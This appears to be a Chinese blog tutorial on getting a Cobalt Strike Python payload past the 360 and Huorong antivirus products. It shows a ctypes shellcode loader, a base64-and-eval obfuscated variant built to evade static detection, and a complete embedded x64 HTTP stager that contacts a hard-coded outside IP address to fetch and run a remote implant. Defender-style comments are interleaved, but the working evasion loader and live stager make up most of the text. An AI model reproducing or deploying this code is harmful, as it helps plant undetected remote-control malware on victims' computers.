CS python马过火绒和360
起源
这篇文章的起源还是得从几天前说起,我问组里师傅免杀好做吗,360和火绒好过吗,哪知道师傅给我来了一句有手就行,给我幼小的心灵造成了极大的震撼
这不行啊 我得研究一下
百度了一下,现在主流杀软的查杀分为静态查杀和动态行为查杀,前者在个人PC上的代表是360和火绒,后者的代表则是Windows Defender
静态查杀又分为特征码查杀和启发式查杀,在免杀制作过程中需要非常注意的是启发式查杀,因为启发式查杀对加壳一类的手段非常敏感;如果数组中包含PE文件,也会直接被判定为病毒。这就导致了你需要尽量模仿正常PE文件才能绕过查杀
绕过
通过百度我们知道要绕过静态查杀需要绕过两种查杀方式,一种为指定特征码查杀,一种为启发式查杀。
实操
先上CS 生成一个python的payload,记得勾选和操作系统对应的位数的payload
然后shellcode 加载器的源码如下
def shellCodeLoad(shellcode):
    """Run an in-memory code blob on Windows through ``ctypes``.

    Every step goes through ``ctypes.windll.kernel32``, so this is
    Windows-only, and the returned address is handled as ``c_uint64``,
    so it is written for a 64-bit interpreter.

    Args:
        shellcode: bytes-like object. Only ``len(shellcode)`` is used
            here; the copy below reads from the module-level ``buf``,
            not from this parameter.

    Detection notes (defender view): VirtualAlloc(RWX) -> RtlMoveMemory
    -> CreateThread on the fresh region -> WaitForSingleObject is the
    textbook allocate-copy-execute sequence that behavioral engines and
    memory scanners key on. The RWX page (0x40) by itself is a strong
    signal, since ordinary code rarely needs memory that is writable
    and executable at the same time.
    """
    # VirtualAlloc returns a pointer; ctypes' default c_int restype
    # would truncate a 64-bit address.
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    # Copies len(shellcode) bytes from the global `buf` (not from the
    # `shellcode` argument) into the executable region.
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
    # eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    # New thread whose start address is the RWX region; lpThreadId is a
    # throwaway pointer to a zero int.
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    # Block on the thread with timeout -1 (all bits set, i.e. INFINITE)
    # so the process stays alive while the thread runs.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
然后简单的混淆
import ctypes
import base64
def shellCodeLoad(shellcode):
    """Same loader as the plain version, with each ctypes statement kept
    as a base64 string that is decoded at runtime and passed to
    ``exec()``/``eval()``.

    Decoded, the strings appear to reproduce, in order: the VirtualAlloc
    restype assignment, the VirtualAlloc call, the RtlMoveMemory copy
    (again from the module-level ``buf``), the CreateThread call and the
    WaitForSingleObject wait. ``ptr`` and ``handle`` are first bound to
    the encoded text and then rebound to the evaluated result.

    Detection notes (defender view): this only removes the API names
    from the plaintext source. ``base64.b64decode`` feeding
    ``eval``/``exec`` on a string literal is itself a widely used
    heuristic trigger, the strings are recoverable by simply decoding
    them, and the runtime allocate-copy-execute behaviour is identical,
    so dynamic and emulation-based engines see the same thing.
    """
    # An assignment statement, hence exec() rather than eval().
    cc="Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NA=="
    exec(base64.b64decode(cc))
    # Expression; evaluates to the address returned by VirtualAlloc.
    # eval() runs with this function's locals, so `shellcode` resolves.
    ptr ="Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpLCBjdHlwZXMuY19pbnQoMHgzMDAwKSxjdHlwZXMuY19pbnQoMHg0MCkp"
    ptr=eval(base64.b64decode(ptr))
    # Copy into the executable region; result is discarded.
    eval(base64.b64decode(
    "Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
    # Thread creation; the encoded text contains the same call as the
    # plain version, including its original line break and padding.
    handle = "Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX3VpbnQ2NChwdHIpLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkp"
    handle=eval(base64.b64decode(handle))
    # Infinite wait on the thread handle bound just above.
    a="Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLCBjdHlwZXMuY19pbnQoLTEpKQ=="
    eval(base64.b64decode(a))
if __name__ == "__main__":
buf = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xe4\x03\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x32\x50\x6a\x71\x00\x46\x33\x3c\x3c\x6f\x02\xc4\x64\x38\x8a\xc2\xe1\xa4\xa1\x05\x35\x42\x08\x6c\xe8\x25\x69\xd5\xf8\x01\x4e\xcc\xe2\xc6\xd9\xe8\xb0\x72\xef\x95\xf2\x54\x4d\x5f\x73\x16\x4d\x70\x28\x48\x45\x3d\xa9\x7d\xd4\x13\xf5\xf1\x54\xc8\xb5\xd2\x4f\x74\xaa\xe6\x31\x63\xce\x27\x2a\xf6\x26\xac\x9c\xb2\x63\xf1\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d
\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x29\x0d\x0a\x00\xf7\xad\xc5\x68\x6e\x5e\xb9\x91\x77\xe7\x7c\xd3\x83\xf7\x94\x45\x45\x8c\x80\x92\x5e\x89\x79\x0c\x62\xe4\x1e\xd3\xab\xa4\x08\xf9\xd8\x69\x42\x9c\x35\x63\xb3\x84\x8a\x54\x27\x60\xe5\x53\x35\x6d\x39\x68\x8b\x04\x23\x1e\xd7\x9d\x65\xb9\x0e\x48\x37\x99\x22\x1f\x59\x08\xf2\x8f\x34\x48\x12\xad\xfe\xbf\x19\xc1\x37\xe5\xb3\x1f\xef\x48\x97\x5f\xdd\xb4\x24\x23\x0d\xc8\x72\x47\xaa\x29\x96\x13\x7e\xe1\xb2\x95\xa0\x7e\xd7\x99\xdd\x79\xfb\x9d\xb6\x18\xd5\x2b\x63\xbc\x51\xc8\x6e\x0f\x0a\xc4\xa8\xb2\xee\xec\x16\xb3\xcf\xee\x26\xf8\xc8\xa3\xb7\x20\x89\xee\x4b\x20\x80\x34\x95\x61\x26\x04\x09\x78\x3e\x8f\x84\xc5\xfa\x65\xc3\x2a\xd2\x42\xee\x7c\x1a\x02\x35\x86\xfb\x1f\x31\x4d\xc1\xd3\xbc\x19\x29\x34\x1b\x79\x39\x3f\x85\x43\xc3\x56\x94\x3f\x60\xb3\x1f\xfd\xe6\xde\x71\xa6\x04\x69\xce\xab\x96\xaf\x42\x05\x0a\xfd\x56\xf8\x9c\x71\xde\xf4\x3b\x90\x03\x32\x47\x5a\xfe\xc9\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x32\x39\x2e\x36\x34\x2e\x31\x37\x31\x00\x19\x69\xa0\x8d"
shellCodeLoad(bytearray(buf))
buf里的是刚才生成的shellcode
pyinstaller打包
查杀效果